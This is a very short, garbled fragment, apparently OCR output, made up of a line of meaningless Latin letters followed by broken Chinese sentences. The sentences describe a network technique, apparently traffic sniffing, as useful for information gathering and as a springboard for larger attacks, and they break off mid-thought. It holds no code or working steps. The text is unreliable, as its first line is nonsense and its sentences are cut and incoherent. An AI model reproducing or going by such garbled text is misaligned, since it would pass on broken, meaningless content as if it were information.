VI REP Ss BARS RITKE Hl? AAR CR B rd FLA LIE RES Ho HIE E 
也 可 以 用 于 更 大 型 攻击 的 跳板 。 


这 个 过 程 对 于 信息 收集 很 有 用 ， 因 为 它 能 收集 到 网 络 上 传输 的 信息 。 取 决 于 网 络 环境 ， 你 可 
息 


